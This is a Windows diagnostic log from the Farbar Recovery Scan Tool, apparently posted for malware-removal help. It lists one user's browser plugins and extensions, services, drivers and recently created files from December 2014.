Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Users\Chris\AppData\Local\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{BCE24BD5-5773-495A-8576-4ADE0BCA38B1}: [NameServer] 8.8.8.8,8.8.4.4
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.2.0\\npsitesafety.dll No File
FF Plugin-x32: @Citrix.com/npican -> C:\Users\Chris\AppData\Local\Citrix\ICA Client\npicaN.dll (Citrix Systems, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.5.1 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @kaspersky.com/content_blocker_6418E0D362104DADA084DC312DFA8ABC -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\FFExt\
[email protected] ()
FF Plugin-x32: @kaspersky.com/virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\FFExt\
[email protected] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\cgpcfg.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\CgpCore.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\confmgr.dll ()
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\ctxlogging.dll ()
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\ctxmui.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\icafile.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\icalogon.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\msvcm80.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\msvcp80.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\msvcr80.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\npicaN.dll ()
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\sslsdk_b.dll (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Chris\AppData\Roaming\mozilla\plugins\TcpPServ.dll (Citrix Systems, Inc.)
FF HKLM-x32\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.1.204
FF Extension: AVG SafeGuard toolbar - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.1.204 [2014-02-05]
FF Extension: Модуль блокування небезпечних веб-сайтів - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\FFExt\
[email protected] [2014-12-11]
FF Extension: Віртуальна клавіатура - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\FFExt\
[email protected] [2014-12-11]
Chrome:
=======
CHR Profile: C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-12-13]
CHR Extension: (Google Docs) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-12-13]
CHR Extension: (Google Drive) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-12-13]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-12-13]
CHR Extension: (YouTube) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-12-13]
CHR Extension: (Google Search) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-12-13]
CHR Extension: (Kaspersky Protection) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbhjdbfgekjfcfkkfjjmlmojhbllhbho [2014-12-13]
CHR Extension: (Google Sheets) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-12-13]
CHR Extension: (No Name) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\kcnhkahnjcbndmmehfkdnkjomaanaooo [2014-12-15]
CHR Extension: (Skype Click to Call) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-12-13]
CHR Extension: (No Name) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2014-12-15]
CHR Extension: (Google Wallet) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-12-13]
CHR Extension: (Gmail) - C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-12-13]
CHR Profile: C:\Users\Chris\AppData\Local\Google\Chrome\User Data\Profile 13
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - No Path
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2013-05-14]
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [4942384 2014-10-17] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [283136 2013-11-20] (AVG Technologies CZ, s.r.o.)
R2 AVP15.0.1; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\avp.exe [234520 2014-08-30] (Kaspersky Lab ZAO)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2443960 2014-10-30] (Microsoft Corporation)
S3 GenericMount Helper Service; C:\Program Files (x86)\Norton Ghost\Shared\Drivers\GenericMountHelperx64.exe [2227216 2010-02-12] (Symantec)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 L4301_Solar; C:\Program Files\Logitech\SolarApp\L4301_Solar.exe [405744 2013-01-30] (Logitech, Inc.)
S3 LiveUpdate; C:\Program Files (x86)\Symantec\LiveUpdate\LuComServer_3_2.EXE [2999664 2007-09-12] (Symantec Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 MSR Service; C:\Program Files (x86)\Clarus\Samsung SecretZone\MSSvc.exe [102400 2009-05-12] () [File not signed]
R2 Norton Ghost; C:\Program Files (x86)\Norton Ghost\Agent\VProSvc.exe [4590432 2010-03-03] (Symantec Corporation)
S2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 Symantec SymSnap VSS Provider; C:\Windows\system32\dllhost.exe [9728 2009-07-13] (Microsoft Corporation)
S3 Symantec SymSnap VSS Provider; C:\Windows\SysWOW64\dllhost.exe [7168 2009-07-13] (Microsoft Corporation)
R3 SymSnapService; C:\Program Files (x86)\Norton Ghost\Shared\Drivers\SymSnapServicex64.exe [2963960 2009-09-21] (Symantec)
R2 vToolbarUpdater18.2.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.2.0\ToolbarUpdater.exe [1806872 2014-12-09] (AVG Secure Search)
S4 ZDManager Service; C:\Program Files (x86)\ZD Systems\ZD Manager\ZDManagerService.exe [176640 2012-11-07] () [File not signed]
S2 NMSAccess; C:\AQi\bin\NMSAccess32.exe [X]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R3 AtcL001; C:\Windows\System32\DRIVERS\l160x64.sys [61440 2009-10-13] (Atheros Communications, Inc.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [246072 2013-11-25] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [71480 2013-07-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [209720 2014-11-04] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [311608 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [116536 2013-07-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [45880 2013-10-23] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [240952 2014-10-17] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [52000 2014-12-09] (AVG Technologies)
R0 cm_km_w; C:\Windows\System32\DRIVERS\cm_km_w.sys [238288 2013-01-14] (Kaspersky Lab UK Ltd)
R3 CVPNDRVA; C:\Windows\system32\Drivers\CVPNDRVA.sys [304784 2010-03-23] ()
R3 GenericMount; C:\Windows\System32\DRIVERS\GenericMount.sys [66608 2010-02-12] (Symantec Corporation)
R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [468576 2014-03-31] (Kaspersky Lab ZAO)
R2 kldisk; C:\Windows\System32\DRIVERS\kldisk.sys [46144 2014-07-02] (Kaspersky Lab ZAO)
R3 klflt; C:\Windows\System32\DRIVERS\klflt.sys [150536 2014-12-11] (Kaspersky Lab ZAO)
R1 klhk; C:\Windows\System32\DRIVERS\klhk.sys [246456 2014-08-12] (Kaspersky Lab ZAO)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [818888 2014-12-11] (Kaspersky Lab ZAO)
R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [30304 2014-02-25] (Kaspersky Lab ZAO)
R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [28768 2014-03-28] (Kaspersky Lab ZAO)
R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2013-08-08] (Kaspersky Lab ZAO)
R1 klpd; C:\Windows\System32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)
R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [55872 2014-06-05] (Kaspersky Lab ZAO)
R1 Klwtp; C:\Windows\System32\DRIVERS\klwtp.sys [77512 2014-12-11] (Kaspersky Lab ZAO)
R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [179776 2014-07-09] (Kaspersky Lab ZAO)
R3 LVPr2M64; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30232 2009-10-07] ()
S3 LVPr2Mon; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30232 2009-10-07] ()
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-05-14] ()
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-01-09] () [File not signed]
R0 symsnap; C:\Windows\System32\DRIVERS\symsnap.sys [170032 2009-09-21] (StorageCraft)
S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52080 2013-08-30] (Cisco Systems, Inc.)
S3 VProEventMonitor; C:\Windows\System32\DRIVERS\vproeventmonitor.sys [20528 2009-09-21] (Symantec Corporation)
S3 vzandnetbus; C:\Windows\System32\DRIVERS\lgvzandnetbus64.sys [24576 2014-05-27] (LG Electronics Inc.)
S3 vzandnetdiag; C:\Windows\System32\DRIVERS\lgvzandnetdiag64.sys [29696 2014-05-27] (LG Electronics Inc.)
S3 vzandnetmodem; C:\Windows\System32\DRIVERS\lgvzandnetmdm64.sys [36864 2014-05-27] (LG Electronics Inc.)
U3 aq763zn8; C:\Windows\System32\Drivers\aq763zn8.sys [0 ] (Microsoft Corporation)
S3 BTCFilterService; system32\DRIVERS\motfilt.sys [X]
S3 motccgp; system32\DRIVERS\motccgp.sys [X]
S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]
S3 motmodem; system32\DRIVERS\motmodem.sys [X]
S3 MotoSwitchService; system32\DRIVERS\motswch.sys [X]
S3 Motousbnet; system32\DRIVERS\Motousbnet.sys [X]
S3 motusbdevice; system32\DRIVERS\motusbdevice.sys [X]
U2 V2iMount; No ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-12-16 05:56 - 2014-12-16 05:56 - 00045011 _____ () C:\Users\Chris\Desktop\FRST.txt
2014-12-16 05:55 - 2014-12-16 05:56 - 00000000 ____D () C:\FRST
2014-12-16 05:54 - 2014-12-16 05:54 - 02119168 _____ (Farbar) C:\Users\Chris\Desktop\FRST64.exe
2014-12-15 16:53 - 2014-12-15 16:53 - 00000000 ____D () C:\Users\Chris\AppData\Local\{982048E2-F993-44D8-B18F-A8FBDA99067E}
2014-12-15 15:23 - 2014-12-15 15:23 - 00102142 _____ () C:\Users\Chris\Desktop\Extras.Txt
2014-12-15 15:21 - 2014-12-15 15:21 - 00149882 _____ () C:\Users\Chris\Desktop\OTL.Txt
2014-12-15 15:12 - 2014-12-15 15:12 - 00602112 _____ (OldTimer Tools) C:\Users\Chris\Desktop\OTL.exe
2014-12-15 15:09 - 2014-12-15 15:09 - 00000000 ____D () C:\Users\Chris\AppData\Local\{563D58FA-84E8-4B76-BB8B-8641967750BD}
2014-12-14 07:53 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-12-14 07:53 - 2014-05-08 04:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2014-12-14 07:48 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-12-14 07:48 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-12-14 07:47 - 2014-11-21 21:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-13 11:13 - 2014-12-13 11:13 - 00000000 ____D () C:\Users\Kids\AppData\Roaming\SUPERAntiSpyware.com
2014-12-13 11:12 - 2014-12-13 11:12 - 00002259 _____ () C:\Users\Kids\Desktop\Google Chrome.lnk
2014-12-13 11:12 - 2014-12-13 11:12 - 00000000 ____D () C:\Users\Kids\AppData\Local\NVIDIA
2014-12-13 10:51 - 2014-12-13 10:51 - 00000000 ____D () C:\Users\Chris\AppData\Local\NVIDIA
2014-12-13 10:51 - 2014-12-13 10:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2014-12-13 09:44 - 2013-10-01 21:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2014-12-13 09:44 - 2013-10-01 21:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2014-12-13 09:44 - 2013-10-01 21:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2014-12-13 09:44 - 2013-10-01 20:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2014-12-13 09:43 - 2013-10-01 20:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2014-12-13 09:43 - 2013-10-01 20:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2014-12-13 09:43 - 2013-10-01 20:29 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2014-12-13 09:43 - 2013-10-01 19:15 - 01057280 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2014-12-13 09:43 - 2013-10-01 19:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2014-12-13 09:43 - 2013-10-01 19:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2014-12-13 09:43 - 2013-10-01 19:08 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2014-12-13 09:43 - 2013-10-01 19:01 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2014-12-13 09:43 - 2013-10-01 18:58 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2014-12-13 09:43 - 2013-10-01 18:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-12-13 09:43 - 2013-10-01 18:08 - 00855552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2014-12-13 09:43 - 2013-10-01 17:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 25059840 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 19749376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 14412800 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 12836864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 06039552 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 04299264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-13 09:41 - 2014-12-13 09:41 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-12-13 09:41 - 2014-12-13 09:41 - 02358272 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-13 09:41 - 2014-12-13 09:41 - 02052096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-12-13 09:41 - 2014-12-13 09:41 - 01888256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat
2014-12-13 09:41 - 2014-12-13 09:41 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-12-13 09:41 - 2014-12-13 09:41 - 00610304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00413696 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-12-13 09:41 - 2014-12-13 09:41 - 00389296 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00342200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2014-12-13 09:41 - 2014-12-13 09:41 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe
